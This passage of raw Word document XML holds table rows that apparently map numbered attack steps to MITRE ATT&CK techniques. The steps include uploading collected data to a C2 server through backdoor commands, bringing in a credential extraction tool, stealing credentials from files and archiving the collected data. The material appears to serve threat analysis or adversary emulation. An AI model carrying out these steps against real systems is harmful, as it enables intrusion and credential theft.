          <w:p w14:paraId="3733ADD2" w14:textId="518D99EA" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A02642" w14:textId="77777777" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE88B12" w14:textId="40567A4D" w:rsidR="001E7F11" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A2BE3E4" w14:textId="5C701CC9" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D27E10" w14:textId="2ADA93C4" w:rsidR="001E7F11" w:rsidRPr="000966C3" w:rsidRDefault="001E7F11" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Backdoor commands 2, 12 and 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC469F" w:rsidRPr="000966C3" w14:paraId="4D105460" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73598C8F" w14:textId="1BB27365" w:rsidR="00AC469F" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D724F65" w14:textId="09E48223" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355CC2DD" w14:textId="1E613B54" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42AC64B6" w14:textId="66A4694F" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA07E72" w14:textId="77777777" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A1FBD92" w14:textId="2B33A985" w:rsidR="00AC469F" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB861EF" w14:textId="77FB0A3C" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2291C3C6" w14:textId="261809C3" w:rsidR="00AC469F" w:rsidRPr="000966C3" w:rsidRDefault="00AC469F" w:rsidP="00AC469F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Backdoor command 33</w:t>
            </w:r>
            <w:r w:rsidR="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>upload a file to C2</w:t>
            </w:r>
            <w:r w:rsidR="00420573">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (data from Discovery Above)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420573" w:rsidRPr="000966C3" w14:paraId="08428CC9" w14:textId="77777777" w:rsidTr="00AF7860">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D831DA9" w14:textId="6659511A" w:rsidR="00420573" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A15BC14" w14:textId="77777777" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EDD2376" w14:textId="77777777" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A61153" w14:textId="5850F402" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00DD7744">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F3847C" w14:textId="77777777" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762E28AA" w14:textId="77777777" w:rsidR="00420573" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DAF4A0" w14:textId="77777777" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E77A0F" w14:textId="12EDCA6F" w:rsidR="00420573" w:rsidRPr="000966C3" w:rsidRDefault="00420573" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Backdoor command 33 upload a file to C2 (data from Discovery Above)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04620" w:rsidRPr="000966C3" w14:paraId="687BBAF4" w14:textId="77777777" w:rsidTr="00AF7860">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D7988F" w14:textId="7B4580CC" w:rsidR="00B04620" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7804A0C1" w14:textId="77777777" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64980126" w14:textId="403CF18F" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D50BA8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36710485" w14:textId="700362A1" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C72381" w14:textId="77777777" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA9E6BF" w14:textId="77777777" w:rsidR="00B04620" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63063A40" w14:textId="4C60FFD5" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F595AD" w14:textId="022B4A71" w:rsidR="00B04620" w:rsidRPr="000966C3" w:rsidRDefault="00B04620" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] </w:t>
            </w:r>
            <w:r w:rsidR="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5] Ingress and run credential extraction tool via commands 4 and 38 in [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA5619" w:rsidRPr="000966C3" w14:paraId="39F04875" w14:textId="77777777" w:rsidTr="00AF7860">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771CE9D4" w14:textId="639F9970" w:rsidR="00AA5619" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B435C48" w14:textId="691EE3C1" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52381025" w14:textId="1F2D998C" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1552.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Credentials In Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD03B0D" w14:textId="122CC765" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E7632E0" w14:textId="77777777" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="678A63FC" w14:textId="77777777" w:rsidR="00AA5619" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432AA59F" w14:textId="1C055A6A" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00A623E8" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE/</w:t>
            </w:r>
            <w:r w:rsidR="00AA5619">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56208DE4" w14:textId="17EC9424" w:rsidR="00AA5619" w:rsidRPr="000966C3" w:rsidRDefault="00AA5619" w:rsidP="00AF7860">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[4] [5] </w:t>
            </w:r>
            <w:r w:rsidR="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>redential extraction tool via commands 4 and 38 in [3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00792749" w:rsidRPr="000966C3" w14:paraId="021E1D6C" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F77FAD9" w14:textId="29E3452E" w:rsidR="00792749" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38DF4880" w14:textId="1062F1CA" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AF3C09">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68ED1F1A" w14:textId="2581BDB5" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1560.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00792749">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BCF2905" w14:textId="24F45F2E" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05659955" w14:textId="77777777" w:rsidR="00792749" w:rsidRPr="000966C3" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B816BD" w14:textId="3EE28316" w:rsidR="00792749" w:rsidRDefault="00792749" w:rsidP="00F834DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
